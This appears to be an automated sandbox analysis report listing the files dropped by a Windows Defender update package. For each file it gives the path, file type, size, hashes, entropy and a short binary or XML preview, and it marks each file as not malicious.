SHA-512:	F5061C48D431E86B5E646EDFB9E4B3C69C6DC543DD04B27D6EB0211A360CBB89201FDC0B0203F22092E77FA8234F6FA2B9E0E4F83192F736CE969CAE5DFB187E
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Service-MpSvcEtw" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<instrumentation>....<events xmlns="http://schemas.microsoft.com/win/2004/08/events" xmlns:ms="http://manifests.microsoft.com/win/2004/08/windows/events" xmlns:win="http://manifests.microsoft.com/win/2004/08/windows/events">.....<provider guid="{751ef305-6c6e-4fed-b847-02ef79d26aef}" message="$(string.Microsoft-Antimalware-Service.provider.name)" messageFileName="%programfiles%\Windows Defender\MpSvc.dll" name="Microsoft-Antimalware-Service" resourceFileName="%programfiles%\Windows Defender\MpSvc.dll" symbol="Microsoft_Antimalware_Service">......

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\Microsoft-Windows-Windows Defender.man

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	XML 1.0 document, ASCII text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	149456
Entropy (8bit):	5.477366012461026
Encrypted:	false
SSDEEP:	1536:5oQofFI+1KSYfSN8bvc0/E/EvJ4rXVEc+ICO+PV5FqGc9HCOKK1HVX:SBfMrIHKK1HVX
MD5:	F02AD94BB9ED8FDABDA9AF79ACF6230A
SHA1:	A461BABC62F003991659368A7F31DBB03E9DA106
SHA-256:	0C5692DBA997F1B4ACA0BD31BCCEA4AAC49B5BC9E5743EC6D11BEC37428BE820
SHA-512:	9FBDD8350F6314E05F76728B32DCF7157A789418606BFBC6C4E009A235920272B11BF675A804F0D8AD4A62A1716895AAC7B0292E142710A149B2F666050BDA93
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8"?>..<assembly manifestVersion="1.0" xmlns="urn:schemas-microsoft-com:asm.v3" xmlns:xsd="http://www.w3.org/2001/XMLSchema">...<assemblyIdentity buildType="release" language="neutral" name="Windows-Defender-Events" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384" versionScope="nonSxS"></assemblyIdentity>...<dependency discoverable="false" optional="false" resourceType="Resources">....<dependentAssembly>.....<assemblyIdentity buildType="release" language="" name="Windows-Defender-Events.Resources" processorArchitecture="amd64" publicKeyToken="31bf3856ad364e35" version="10.0.10011.16384"></assemblyIdentity>....</dependentAssembly>...</dependency>... .. ********************************************************************************************************.. BEGIN FILES SECTION .. *********************************************************************************************************.. --

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpAsDesc.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	210184
Entropy (8bit):	5.228872488126836
Encrypted:	false
SSDEEP:	6144:RmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV60jVLVVOVVUVZVVVVVjVVJB:Th
MD5:	69F046F01F8F661C2D060082911393A7
SHA1:	C26FC18F0F0A06D501BE414EA3C73AA67F117201
SHA-256:	17E1118EC98E9756C54A0C40B3DFAECC6B7140A59F7CE8C5AAB5E2D63DF42B96
SHA-512:	DE6893447D1EF519C38C4E0FBD9CDF2318DBFAFA368537A28273F9252767863863BA84E30B2618271A3A79833EA41FB87E293BFFAE59993DE0404F9152A2F811
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d......<.........." ................................................................+.....`.......................................................... ...................%..............T............................................................................rdata..............................@..@.rsrc........ ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpAzSubmit.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1340680
Entropy (8bit):	6.310755864603227
Encrypted:	false
SSDEEP:	24576:rHxbOJ2QxjiDETQvOs+fRlIVT2kQAsj8E/ivRxYJg5s/px5:rHxby2QMDE8gfRlIVZRE/iC
MD5:	B036691DE504AFC094215F1914D4D55A
SHA1:	F8FDF0D9BD1BC01A455DC7CBB6B46B2750116799
SHA-256:	0A81F395025BAC0A0618D98E876477C79712C797F4D1203D62B1C1457049AEB0
SHA-512:	FAE45823DD368E94A23B73DFCE86DC661A31A249FAE9BCDE2C27E10343B75D8298704CAFAD408E4D47C5E5A70CC967D6C991B38DCD28FEE3827E78EA93B88535
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......3.Z.w.4Rw.4Rw.4R<.5Sd.4Rw.5R6.4R<.7Sc.4R<.0S\.4R<.1S..4R<..Ru.4R<.4Sv.4R<.=S.4R<..Rv.4R<.6Sv.4RRichw.4R................PE..d................." .................'.........f.............................p......-.....`A................................................`........0.......p..D....P...%...@...-..l...p...................P/..(.......@...........x/...............................text.............................. ..`.rdata..............................@..@.data...............................@....pdata..D....p.......P..............@..@.rsrc........0......................@..@.reloc...-...@...0... ..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpClient.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1238288
Entropy (8bit):	6.284184344287156
Encrypted:	false
SSDEEP:	24576:zPvZGm0QJGxPX4H1vYpaA1dxRvFghtLOrfoeDB:kPDPX4H1vQ71druhWoel
MD5:	01B7F6ECBE71764DE8754230F8BD0B45
SHA1:	CDA1DDA78A75BA3AC1BD53C2BF2B5FA6FEEC1356
SHA-256:	288071E68AC9EADA23C7ACD312998584CE4E2D91B34C32C56533E51FFA27E106
SHA-512:	5BEAA7CCA576453B4F39BE49D8B4EF2B5C295AC48B68D23271DFD41B1863BB6515FCADB2F310C95CB517A18E46B3C27D62A15B40410C1F909ABBD485A9C82954
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x.........a....a......a...a`......B...a......a......a....a..\........a......a...Rich...........................PE..d................." ..........................[....................................Q ....`A........................................ ...l.......T........................%.......!......p...................8...(.......@...........`.......l........................text............................... ..`.rdata...l.......p..................@..@.data... ....@.......@..............@....pdata..............................@..@.didat...............p..............@....rsrc...............................@..@.reloc...!.......0..................@..B........................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpCmdRun.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	993000
Entropy (8bit):	6.17513414443517
Encrypted:	false
SSDEEP:	12288:uNfgsDU1uXaysw+jAo18lEp2zku5RI6+yrIFuq7ft91ILz:uy9uF9+/1mm2zkKh+yrIFJTt3In
MD5:	60EDC2A1DF1D9EEB37D0729BD76CE568
SHA1:	67D630A477723697CC2815257CCFF432200D09D9
SHA-256:	17A18346D87CD379375D8ED87D4563DCFA97503068465E0D63BFFCB348BE75C0
SHA-512:	C79524A14F50623A84EDE7E5D157F3E82B9130B2B46BCC23FC5CF59C464581DBE934E9F3E13CB510A24F9773194967D3217CC3FF70D6EB9E921B112A78EA9535
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........c..0..0..0..1..0..1..0..60..0..1.0..1..0..0...0..1...0.T.0..0..Z0..0..1..0Rich..0................PE..d...l.B\.........."......`...........<.........@....................................G................ ......................................(...................8X.......F..............p.......................(....x..@...........0.......P... ....................text...+T.......`.................. ..`.rdata.......p.......p..............@..@.data....R...@...P...@..............@....pdata..8X.......`..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpCommu.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	365832
Entropy (8bit):	6.189208165298729
Encrypted:	false
SSDEEP:	6144:0lC7FTP+H/2NAxkjl7x8XsF9xZdGG2FwQn8ebu2yV2WTzZQ:1D+H/MhGMxYRn8Nn7Q
MD5:	3C00FF017BBCA95E4A4290CCD1FE7165
SHA1:	CA2BF0E2DC42B7D6DBF57113504B7E3D9FBA3FE0
SHA-256:	CAE6EEB6C836E462D353EC039A7086047ACF75E271C2A748EB45409F9288841B
SHA-512:	BB356AA2980D2198A3F5359810BE0EF426476DE2FD2EC94692793370155EB8BE8C7F546E42E9FD78E15461C5B848A78624042F23EAFF9C83ECB9F0B4A723176A
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*..[n..n..n..%...`..%...`..%...g..g......n..4..%...C..%...o..%...5..%.r.o..%...o..Richn..........PE..d...4^............" .................7.........f....................................Qk....`A........................................`.......0........`....... ..<-...p...%...p.. ...\1..p...................0...(.......@...........X.......\........................text.............................. ..`.rdata..h........ ..................@..@.data....#....... ..................@....pdata..<-... ...0..................@..@.didat..X....P.......@..............@....rsrc........`.......P..............@..@.reloc.. ....p.......`..............@..B........................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpCopyAccelerator.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	174864
Entropy (8bit):	5.429784241744532
Encrypted:	false
SSDEEP:	3072:A+hEtFNIswK+MhL9JzFEKTeOmqE6OTuXM2:DuicbhLf66O6
MD5:	8DDC0C6F8FF7E536A99525E42029C78B
SHA1:	A1B7F5411458D684A9468AE9B3D0AD4326027C5C
SHA-256:	1718ADC90B1306FFC2914487AD5B38933A1F7909587BE51FA7F306B3C110D1B8
SHA-512:	1A7CB34071A1ED7204A2F38C754ADF5B1C25E595B594145197FE9C760F013B6A3ACAD9198DF70C4B29AD0A515E8525AE40F6131972022E771E05C0693DBEF38E
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........@..............................M.......................................!.............Rich............................PE..d...d]............"..........`.................@..................................................... .......................................m...........................+...p..8....I..p................... &..(.... ..@...........H&...............................text............................... ..`.rdata...`... ...p... ..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..8....p.......p..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpDetours.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	173312
Entropy (8bit):	5.865450816648862
Encrypted:	false
SSDEEP:	1536:IpEqQLqk4J/ja4j3iMfoGx/OCbC14jMYlhsUguEIvadRadzhJqz5BTE+CpAs+Yqm:IeqQLqvJO8gUgutdQzEFasYxYp
MD5:	EB44AEBFF15B908F62F655D8574F0211
SHA1:	C53572499C443D51BEFA9E0FB7EA13C8D9B6CD70
SHA-256:	0E6CB8E7DE57D65EC64364658D71E692EB1DC17C8D1B2AE78172FF86198563A4
SHA-512:	C36D1118A0C00C492D3FC3ACA95BDD2004C2A3224F490869A418869565EE5CC86A7AE04B114DDD68C80DCFA2A33F11B07EC298F745DF5EB1954A14C5FB8C94F4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... %.edDr6dDr6dDr6/<s7tDr6/<v7hDr6/<q7lDr6m<.6kDr6dDs6QEr6/<w7NDr6/<r7eDr6/<{7-Dr6/<.6eDr6/<p7eDr6RichdDr6................PE..d.....)..........." ................ '..............................................d$....`A.........................................................p.......P..<........%..........@...p.......................(...`...@............................................text..."........................... ..`.rdata..............................@..@.data........0.......0..............@....pdata..<....P... ...@..............@..@.rsrc........p.......`..............@..@.reloc...............p..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpDetoursCopyAccelerator.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	103680
Entropy (8bit):	5.572113522034459
Encrypted:	false
SSDEEP:	1536:JcWQg1yzvWG5hCcD9I2NRAUQIW4QuRX8jQbRPVCPvah+zwLK:JRSD9VNZd18jybCHD8u
MD5:	0B2331F6422A23555C47EC81B0B48849
SHA1:	20F0C6B612FCC4A488A41B30515EEACCDD2213C0
SHA-256:	5BFFD333CA93462920F1635640090C62A84D241C16D2F6494126501BBDF60DC4
SHA-512:	C165E6416BA9B1F35FF64632D757DF8B64F1484783914272A949B4309C35C8DEB737545C8A4028134C295E5F1F9604757F77317B1F485BE0E310BBF9929614CD
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-..ui..&i..&i..&"..'c..&"..'e..&"..'a..&`.8&f..&i..&y..&"..'@..&"..'h..&"..'V..&".T&h..&"..'h..&Richi..&................PE..d...mh<..........." ................Pa...................................................`A........................................@...H............`..X....P.......p...%...p..........p...................p...(...0...@...............0............................text...2........................... ..`.rdata..:Y.......`..................@..@.data........0.......0..............@....pdata.......P.......@..............@..@.rsrc...X....`.......P..............@..@.reloc.......p.......`..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpDlpCmd.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	389728
Entropy (8bit):	5.835662549206683
Encrypted:	false
SSDEEP:	6144:R0a+l0A2oAkdY0+U1RiyL0miTVVmVVV8VVNVVVcVVVxVVVPVVlVVVRVVVtVVWV6J:Rml0YAkdNPiyLe4
MD5:	69150F81B07EF9655BD83401D319795E
SHA1:	DB6290CCBEE4A02D371C6758B16584E2FFF6FD51
SHA-256:	8698065D54C44E78F2D347BE1B43D6843F2D0B1CDE8A85266B25A8DBBE8C0697
SHA-512:	CC870D567C0F1B0FD35C1C5A391FA25140DF30B4BCA5050A0E96AB75C7D636E28ED2E330DEC1317CD5DDB60D8C1E6536F71743C6E832CF1B7B21A5E34B5FDA73
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9.'.}.I.}.I.}.I.6.M.s.I.6.J.u.I.t...m.I.6.L.O.I.6.....I.6.H.j.I.}.H.R.I.6.@.K.I.6...\|.I.6.K.\|.I.Rich}.I.........................PE..d..............."..................a.........@..................................................... .......................................L..@...............,.......`2......p.......p.......................(...`...@...............h............................text............................... ..`.rdata..............................@..@.data........p.......p..............@....pdata..,........ ..................@..@.rsrc...............................@..@.reloc..p...........................@..B................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpEvMsg.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	144656
Entropy (8bit):	3.907524491292496
Encrypted:	false
SSDEEP:	768:YOmWulQnuBkG22Tumo0cTH6QKqCmuKqrWmNKq4mZKqdmjj4Kqpmpds1P8Xzg9zA2:X6BkG2usqP8Dozw0
MD5:	F7D9399A1C9481060B4FA3BBC80926E9
SHA1:	5EC3F94A482602276014B47E571539DE5B6DDDCD
SHA-256:	DC3D7A692DB783B373309841DC1E82205B75082F4848113C0412D0C9F11B2263
SHA-512:	6084230EA17297EE998DC89389070D36EC4A8D808D5185B5D86D3689BFC061E3A07249E14FE4D4F78FF63ADD2DDD047678D5B633BBA6A0D5B42AA50E82A29E80
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..d...=.r.........." ................................................................p.....`.......................................................... ..X................%..............T............................................................................rdata..............................@..@.rsrc...X.... ....... ..............@..@........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpOAV.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	505096
Entropy (8bit):	6.0486451497759415
Encrypted:	false
SSDEEP:	6144:+pa2jZwVJ8o7AAROEBMB/C3BltMCCbvpmiTVVmVVV8VVNVVVcVVVxVVVPVVlVVV5:+O8o7AARH0C3BltBCbry
MD5:	A082D51D9D2FCA41BFD28972FD3748C4
SHA1:	1A55326F584A8FA9AA57EF0431DF78B4182EA321
SHA-256:	3C8255F567A8068AB079F25EED2483A04D9442F5DCD1F9B78FE9E478008A8E27
SHA-512:	BEA807354A08866A9268214235F8BEB253B2C55C772EA47B33E3B377391A21BAE215C141FC53BA8CCD846BEB74CAE1944D235EA2506F916B762F6890F218058F
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......~..&:.u:.u:.uq..t+.u:.u..uq..t!.uq..t5.uq..t..uq..t;.uq..tv.uq.su;.uq..t;.uRich:.u........PE..d...E,.a.........." ..... ..........p.........._..........................................`A.........................................0......$1..x...............$$.......%..........X...p....................X..(...`W..@............X..p............................text............ .................. ..`.rdata.......0.......0..............@..@.data....0...@... ...@..............@....pdata..$$.......0...`..............@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpRtp.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1795344
Entropy (8bit):	6.415045366249984
Encrypted:	false
SSDEEP:	49152:xSezVA1vvRVENPHBsEZLnLxO3o9WWbIhvOw2fKVMb1ie8:8D3qMOw5
MD5:	659AA4AE9348F71CDE798AC5248DFEA1
SHA1:	D429A68E14B32A9E87CFCA353328657E8AFCD4B3
SHA-256:	1E75629D55321E6F1301D511B2A3F79BEA0F320796ADB75E9C12543FF06AAB47
SHA-512:	6CC57AB909D604AF3EF253A706D3E6F90FFF90051C54714667505F391EB37C0844BC4FFBB1C8735347B96EBDAB776B017DBE62717BC4DA45AE959E6C3F8BE8E3
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......z.s>.. >.. >.. u..!).. >.. .. u..!*.. u..!... u..!.. u.. <.. u..!?.. u..!.. u.. ?.. u..!?.. Rich>.. ........PE..d....hm..........." .....0... ......P..........^.............................`............`A........................................P3......(?...........u......t....@...%...@..<...,(..p.......................(....i..@...........(...0...P+..@....................text....-.......0.................. ..`.rdata...$...@...0...@..............@..@.data....y...p...`...p..............@....pdata..t...........................@..@.didat..............................@....rsrc....u..........................@..@.reloc..<....@... ... ..............@..B........................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSenseComm.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	902408
Entropy (8bit):	6.3239119668596295
Encrypted:	false
SSDEEP:	12288:jMQUBF4lyh7oKj+dnEIl2Utg9Lke3doMOoYxdLGrkKH:jMhFMyZbjkdl2UILBdoMO/GrkS
MD5:	D3B49C3DAF078EA17A9105FEEB614444
SHA1:	ED7F08ABBC6C94E83CE4AAF58FF4DCDF9AD287EE
SHA-256:	393514A9E16C47B568A0FD4032F8ABC852D9F418FE0FAD98643DE5044DEAD671
SHA-512:	4CF3C8288EC1CE21DA82D3C4A0362B3669091FA42F7907C6630B450F67BF8C5E7243189C74E817253115DD2DED5ABDCFB099064362C0335DC4455C1016E5B24B
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........%...D..D..D.<...D..D..aD.<...D.<...D.<..D.<...D.<..D.<...D.<...D.<...D.Rich.D.........PE..d....jEc.........." .....0...p......0...............................................6.....`A............................................\|...l...x...............de.......%..........P...p.......................(......@...........8................................text.../,.......0.................. ..`.rdata..J....@.......@..............@..@.data...@....0.......0..............@....pdata..de.......p..................@..@.rsrc................p..............@..@.reloc........... ..................@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSigStub.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	803176
Entropy (8bit):	6.37118649960636
Encrypted:	false
SSDEEP:	24576:Ghj1QlBYDgtUUvie3n+pB3+ojRlcD1VyZTFXk:GhpQlBHtBYla1VyZpU
MD5:	01F92DC7A766FF783AE7AF40FD0334FB
SHA1:	45D7B8E98E22F939ED0083FE31204CAA9A72FA76
SHA-256:	FA42B9B84754E2E8368E8929FA045BE86DBD72678176EE75814D2A16D23E5C26
SHA-512:	BEA5F3D7FB0984C4A71720F25644CE3151FCDC95586E1E2FFE804D04567AAF30D8678608110E241C7DDF908F94882EDDD84A994573B0C808D1C064F0E135A583
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........B..#...#...#..EV...#...Q...#...Q...#...Q...#...Q...#...#..."..EV..#..EVN..#..EV...#..Rich.#..........PE..d.....P.........."......`....................@.............................0.......-....`.......... .......................................t..d....... ........D... ..h!... ......d...p.......................(......8...........0................................text...2R.......`.................. ..`.rdata.......p... ...p..............@..@.data..../....... ..................@....pdata...D.......P..................@..@.rsrc... ...........................@..@.reloc....... ......................@..B........................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpSvc.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	3577104
Entropy (8bit):	6.391478500460786
Encrypted:	false
SSDEEP:	49152:ZQ/Ezd1FbOjfjhAEFDENsP+HxHLFbZTLlw+kR8P/ykQ4VQtU2386D1MBBWVG/wyy:Gud1Fb09AEFeZhc/02qEcA
MD5:	856E885E779B7A69EF4FF406F4FA9FEF
SHA1:	B533C1C7D913558DD7E14DD8ADE4B97CE6300DD6
SHA-256:	235CD0DA7033946EBC19E40297381BF7772A289D5AC86EB1996DB4C60473924A
SHA-512:	2465A56CCBF2F99055003C6CED51DF209C037B61967430CF32B0BCF00CB8826C508EAF076404052CCED208022E0089DB0541DF3DA748B7336C5F5C43B1074C07
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........R..R..R......D......A......X..[.,.E..R..3......c....B.P......S......*..u...U....@.S......S..RichR..................PE..d.....W..........." ......(.........0..........\..............................6......6...`A........................................."3.d...4#3.......5......p4..W...p6..%...p6..6......p...................X.).(.....(.@.............).....`.3......................text....(.......(................. ..`.rdata........(.......(.............@..@.data........`3......`3.............@....pdata...W...p4..`...04.............@..@.didat........5.......5.............@....rsrc.........5.......5.............@..@.reloc...6...p6..@...06.............@..B................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpUpdate.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	156936
Entropy (8bit):	5.705583024147514
Encrypted:	false
SSDEEP:	3072:Cxrr+YZgLDlihKEQL+iQEKTe2OVHfbf/6l:CFr+YZqheK7Fzil
MD5:	29AEC41325BFAE570C85459152EBE298
SHA1:	7AD4429A20E26B757DC678D460E2F92F59B17C4D
SHA-256:	C4C99F248A2E7E8F96F9D55BCBBB12A59F65227F7065A49C9353A7FA48AEC90E
SHA-512:	56C4E5C5B22653661C5B531F877492D6344D63F8E9488CD484A7B14E35A1140F84DDBF88076626A7262DBB2E35D8240F69B69E833B07A651CF11BBA37F03C0D4
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........G2.H&\OH&\OH&\O.^]N[&\O.^XNE&\O.^_N@&\OA^.OF&\OH&]O.'\O.^YNb&\O.^\NI&\O.^UN.&\O.^.OI&\O.^^NI&\ORichH&\O........PE..d....b..........." .....0.....................h.............................P.......l....`A............................................L............0...............@...%...@..$...0...p....................e..(....d..@............f...............................text...2(.......0.................. ..`.rdata.......@.......@..............@..@.data... ...........................@....pdata........... ..................@..@.rsrc........0....... ..............@..@.reloc..$....@.......0..............@..B................................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MpUxAgent.dll

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	558344
Entropy (8bit):	6.077626746902674
Encrypted:	false
SSDEEP:	6144:CEunvv7sgmK8zaNcgAH2IGCXbzAoO+7MrHiTVVmVVV8VVNVVVcVVVxVVVPVVlVVC:funvv7sgf87gAH2IGCXbzAV+bz
MD5:	49A1F2027EA47DD7F52651BA3ACD59AA
SHA1:	916ED3E71AD9336F6C36243EF8B661CDBAAAB53A
SHA-256:	0A6A7A2A3E44D17AF7D9B83D503ADED7B528678F2A47433E13542B6F1BA2B4CA
SHA-512:	74A4ED5F1D8702C9CD9E288DA224B66F40445BF2F76F2BF1BD7D7B4E38F53A723065887820A4BD7ACADE5815830E3BAAB9E5ACD5567EBED25657FED5C5875D69
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K......W...W...WD..V...WD..V...WD..V...W...W ..W...W...WD..V#..WD.}W...WD..V...WD..Vo..WD..W...WD..V...WRich...W........PE..d......h.........." .................V.......................................`.............A........................................P................`..\....0...%...`...%...P.......P..p...................`...(... ...@............................................text...L........................... ..`.rdata........... ..................@..@.data....-.......0..................@....pdata...%...0...0...0..............@..@.rsrc...\....`.......`..............@..@.reloc.......P.......P..............@..B........................................................................................................................................................................................................................................................

C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\724B5320-FE6C-430F-AB77-13F2FD7207BA\MsMpEng.exe

Download File

Process:	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-60574f34.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	133544
Entropy (8bit):	5.848615249699151
Encrypted:	false
SSDEEP:	3072:UpmbTWzjcZlEUNAy53Rn6KTekJVT+ARjRf6lR:UpQWzjpUNX53Rnl+wFIR
MD5:	12F0FE026D6A305044A713DA22C6AE37
SHA1:	9B11F405174FA764FC9D0DFD3D53EBF91364FDE5
SHA-256:	AE2C900FB2A2B1182E6C4BFAF2D0D6A969EFACD94D78DB71677902A945E251AE
SHA-512:	5295B162EE53FCA6355E7851C907D4AECB6A8FE2CFA87BAFE9C5EA283D0942BBB485579224D04260949D6FE1E2B6DB5FE17C95A63B93F851317CD0821EEA8392
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......R.....N...N...N]..O...N]..O...N..ZN...N]..O&..N]..O...N...N ..N]..OR..N].6N...N]..O...NRich...N................PE..d...Z.{..........."...... .....................@............................................................................................{...........................)......d....L..p................... 4..(....2..@...........H4...............................text...R........ .................. ..`.rdata...Z...0...`...0..............@..@.data...............................@....pdata........... ..................@..@.rsrc...............................@..@.reloc..d...........................@..B................................................................................................................................................................................................................................................................

